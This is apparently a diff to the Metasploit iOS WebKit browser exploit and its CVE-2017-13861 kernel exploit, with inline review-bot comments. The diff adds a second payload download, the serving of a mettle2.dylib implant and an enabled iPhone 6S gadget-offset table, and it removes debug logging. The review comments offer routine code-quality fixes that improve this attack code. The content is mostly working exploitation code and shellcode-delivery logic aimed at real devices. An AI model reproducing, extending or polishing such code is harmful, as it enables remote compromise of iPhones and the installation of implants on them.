diff --git a/external/source/exploits/CVE-2017-13861/kernel_utils.m b/external/source/exploits/CVE-2017-13861/kernel_utils.m
index c919f1aeb4..d7b1a65154 100644
--- a/external/source/exploits/CVE-2017-13861/kernel_utils.m
+++ b/external/source/exploits/CVE-2017-13861/kernel_utils.m
@@ -119,9 +119,7 @@ void Kernel_memcpy(uint64_t dest, uint64_t src, uint32_t length) {
 uint64_t proc_of_pid(pid_t pid) {
 uint64_t allproc = Find_allproc();
- LOG("allproc %p", (void*)allproc);
 uint64_t proc = KernelRead_64bits(allproc), pd;
- LOG("proc %p", (void*)proc);
 while (proc) { //iterate over all processes till we find the one we're looking for
 pd = KernelRead_32bits(proc + 0x10);
diff --git a/external/source/exploits/CVE-2017-13861/loader.c b/external/source/exploits/CVE-2017-13861/loader.c
index 1ec9547078..3b56a050f8 100644
--- a/external/source/exploits/CVE-2017-13861/loader.c
+++ b/external/source/exploits/CVE-2017-13861/loader.c
@@ -85,10 +85,6 @@ void init(void* dlopen_addr, void* dlsym_addr, void* jitwrite_addr, uint64_t sta
 debug_print("buffer:%p", (void*)payloadBuffer);
 debug_print("nbuffer:%p", (void*)*(uint64_t*)payloadBuffer);
 debug_print("start:%p", (void*)startOfFixMem);
-
- /*void* libjsc = dlopen_func("/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore", RTLD_NOW);*/
- /*debug_print("jit %p", libjsc);*/
-
 #endif
 load((void*)payloadBuffer, (t_dlsym)dlsym_func, jitwrite_addr, (void*)startOfFixMem, (void*)endOfFixMem);
@@ -114,17 +110,6 @@ void performJITMemcpy(t_dlsym _dlsym, void* jitwrite, void* startOfFixMem, void*
 off_t offset = (off_t)((uintptr_t)dst - (uintptr_t)startOfFixMem);
 jitWriteSeparateHeapsFunction(offset, src, size);
- /*uint64_t* stack_check_guard = _dlsym(RTLD_DEFAULT, "__stack_chk_guard");*/
- /*char* gadget = _dlsym(RTLD_DEFAULT, "_ZN3JSC10LinkBuffer8linkCodeERNS_14MacroAssemblerEPvNS_20JITCompilationEffortE");*/
-
- /*// jitcode.s has gadget code*/
- /*const char* pattern = "\x93\x21\x98\xD2\xF3\xFF\xBF\xF2\xF3\x01\xC0\xF2\x69\x02\x40\x39";*/
- /*int pattern_length = 16;*/
- /*while (_memcmp(gadget, pattern, pattern_length))*/
- /*gadget++;*/
-
- /*jitcopy(gadget, stack_check_guard, dst, src, size);*/
-
 ASSERT(!_memcmp(dst, src, size));
 }
diff --git a/external/source/exploits/CVE-2017-13861/payload.m b/external/source/exploits/CVE-2017-13861/payload.m
index 462f5b4486..bf27fa9f5b 100644
--- a/external/source/exploits/CVE-2017-13861/payload.m
+++ b/external/source/exploits/CVE-2017-13861/payload.m
@@ -31,8 +31,7 @@
 #define SLOG(msg, ...) \
 do { \
- NSLog(@"GREPME" msg "\n", __VA_ARGS__); \
- if (getuid() == 123) { \
+ if (getuid() == 0) { \
 FILE* logfile = fopen("/var/mobile/log.txt", "a");\
 fprintf(logfile,msg, __VA_ARGS__); \
 fclose(logfile); \
@@ -53,10 +52,15 @@ int download_payload(char* file_path, const char* config_placeholder)
 unlink(file_path);
 SLOG("%s", "Downloading payload\n");
+ const char* payload_url = "payload";
+ if (kCFCoreFoundationVersionNumber >= 1443.00) {
+ payload_url = "payload2";
+ }
 // Load the payload from server
 int sockfd = 0;
 struct sockaddr_in serv_addr;
- const char *getpayload = "GET /payload HTTP/1.1\r\n\r\n";
+ char getpayload[100];
+ snprintf(getpayload, sizeof(getpayload), "GET /%s HTTP/1.1\r\n\r\n", payload_url);
 const int chunk_size = 4096;
 char* payload_buffer = malloc(chunk_size);
 if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
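Review bot: The new `if (getuid() == 0)` guard in the SLOG macro still hands an unchecked `fopen` result to `fprintf` and `fclose` on the lines that follow; when `/var/mobile/log.txt` cannot be opened, a log call dereferences a null `FILE*` and aborts the process. Guarding the body, `if (logfile) { fprintf(logfile, msg, __VA_ARGS__); fclose(logfile); }`, keeps a failed open from turning a log statement into a crash. The macro definition continues past the end of the hunk, so the closing lines are not visible here.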
diff --git a/external/source/exploits/CVE-2017-13861/trustcache.m b/external/source/exploits/CVE-2017-13861/trustcache.m
index 68d5145482..a4ff3b63ce 100644
--- a/external/source/exploits/CVE-2017-13861/trustcache.m
+++ b/external/source/exploits/CVE-2017-13861/trustcache.m
@@ -10,7 +10,9 @@
 #include "sha256.h"
 #import
-#define LOG(str, args...) do { NSLog(@"[*] " str "\n", ##args); } while(0)
+
+//#define LOG(str, args...) do { NSLog(@"[*] " str "\n", ##args); } while(0)
+#define LOG(str, args...)
 struct trust_mem {
 uint64_t next; //struct trust_mem *next;
diff --git a/modules/exploits/apple_ios/browser/webkit_createthis.rb b/modules/exploits/apple_ios/browser/webkit_createthis.rb
index a744aec99c..a01e080ddd 100644
--- a/modules/exploits/apple_ios/browser/webkit_createthis.rb
+++ b/modules/exploits/apple_ios/browser/webkit_createthis.rb
@@ -28,9 +28,10 @@ class MetasploitModule < Msf::Exploit::Remote
 ],
 'References' => [
 ['CVE', '2018-4233'],
+ ['CVE', '2017-13861'],
 ['URL', 'https://github.com/saelo/cve-2018-4233'],
 ['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'],
- ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1564'],
+ ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'],
 ['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'],
 ],
 'Arch' => ARCH_AARCH64,
@@ -73,6 +74,12 @@ class MetasploitModule < Msf::Exploit::Remote
 send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})
 print_good("Sent payload")
 return
+ elsif request.uri =~ %r{/payload2$*}
+ dylib_path = ::File.join Msf::Config.data_directory, 'mettle', 'aarch64-iphone-darwin', 'bin', 'mettle2.dylib'
+ payload_data = ::File.binread dylib_path
+ send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})
+ print_good("Sent payload")
+ return
 end
 user_agent = request['User-Agent']
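Review bot: The replacement `#define LOG(str, args...)` expands to nothing, so a `LOG(...)` that is the whole body of an unbraced `if` becomes an empty statement and any local referenced only inside a LOG argument becomes unused, which the old `do { ... } while(0)` form did not cause. A compiled-away variant that keeps the statement shape and the argument references, `#define LOG(str, args...) do { if (0) { NSLog(@"[*] " str "\n", ##args); } } while(0)`, gives the same silence without those warnings and keeps format-string checking on the call sites. The commented-out copy of the old definition on the line above is then dead text; an `#ifdef` switch between the two definitions would state the intent better than a comment.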
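Review bot: `%r{/payload2$*}` in the new `elsif` is not anchored: `$*` is the end-of-line anchor repeated zero or more times, so the pattern matches any URI that merely contains `/payload2`, and `%r{/payload2$}` is presumably what was meant. Whether this branch is reachable at all also depends on the preceding `/payload` condition, which lies outside the hunk; if that pattern is unanchored in the same way it already matches `/payload2` and the new branch never runs, so both conditions are worth checking together. The five added lines also repeat the serving sequence of the branch above them; a small private helper taking the dylib file name would keep the two paths from drifting apart.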
@@ -458,14 +465,10 @@ function pwn() {
 "__platform_memmove" : 0x1806ffe00, "_usleep" : 0x18056011c, "_dlopen" : 0x18052dd10, "_dlsym" : 0x18052ddd8, "_mach_task_self_" : 0x1a586e3bc, "__ZN3JSC30endOfFixedExecutableMemoryPoolE" : 0x1a457c438, },
- /* // iPhone 6S 11.0.3
- 425478416 : { "regloader" : 0x180051ad8, "dispatch" : 0x19b323a4c, "stackloader" : 0x19b2e6f40, "__longjmp" : 0x1807bd7dc, "__kernelrpc_mach_vm_protect_trap" : 0x180694afc,
+ 425478416 : { "regloader" : 0x180051ad8, "dispatch" : 0x19b323a4c, "stackloader" : 0x19b2e6f40, "__longjmp" : 0x1807bd7dc, "__kernelrpc_mach_vm_protect_trap" : 0x180694afc,
 "__platform_memmove" : 0x1807bdab0, "_usleep" : 0x1805cee70, "_dlopen" : 0x180587460, "_dlsym" : 0x180587574, "_mach_task_self_" : 0x1b1562fac,
- "__ZN3JSC32startOfFixedExecutableMemoryPoolE" : 0x1b15d89f8,
- "__ZN3JSC30endOfFixedExecutableMemoryPoolE" : 0x1b15d8a00,
- "__ZN3JSC29jitWriteSeparateHeapsFunctionE" : 0x1b15d8a08, },
- */
+ "__ZN3JSC32startOfFixedExecutableMemoryPoolE" : 0x1b15d89f8, "__ZN3JSC30endOfFixedExecutableMemoryPoolE" : 0x1b15d8a00, "__ZN3JSC29jitWriteSeparateHeapsFunctionE" : 0x1b15d8a08, },
 }
 var offsets = offset_cache[uuid];
@@ -514,7 +517,7 @@ function pwn() {
 // mov x4, x20 ; blr x8
 "movx4": [ [ 0xaa1403e4, 0xd63f0100 ] ], }
- opcode_libs = [
+ var opcode_libs = [
 "/usr/lib/PN548.dylib", // dispatch, stackloader
 "/usr/lib/libc++.1.dylib", // ldrx8, regloader, movx4, stackloader
 ];
@@ -540,7 +543,6 @@ function pwn() {
 }; var opcode_libs = [ "/usr/lib/libLLVM.dylib" ];
- '}
 var imgs = Add(hdr, memory.u32(Add(hdr, 0x18)));
@@ -718,14 +720,16 @@ function pwn() {
 var movx4 = offsets["movx4"]; // might be null
 var mach_task_self_ = new Int64(memory.readInt64(task_self).lo());
- var memPoolStart = memory.readInt64(startOfFixedMem);
 var memPoolEnd = memory.readInt64(endOfFixedMem);
- var jitWriteSeparateHeaps;
- if (syms["__ZN3JSC29jitWriteSeparateHeapsFunctionE"]) {
- jitWriteSeparateHeaps = memory.readInt64(syms["__ZN3JSC29jitWriteSeparateHeapsFunctionE"]);
- } else {
- jitWriteSeparateHeaps = Int64.Zero;
+ var memPoolStart = Int64.Zero;
+ if (startOfFixedMem) {
+ memPoolStart = memory.readInt64(startOfFixedMem);
+ }
+
+ var jitWriteSeparateHeaps = Int64.Zero;
+ if (offsets["__ZN3JSC29jitWriteSeparateHeapsFunctionE"]) {
+ jitWriteSeparateHeaps = memory.readInt64(offsets["__ZN3JSC29jitWriteSeparateHeapsFunctionE"]);
 }
 var shsz = new Int64("0x100000");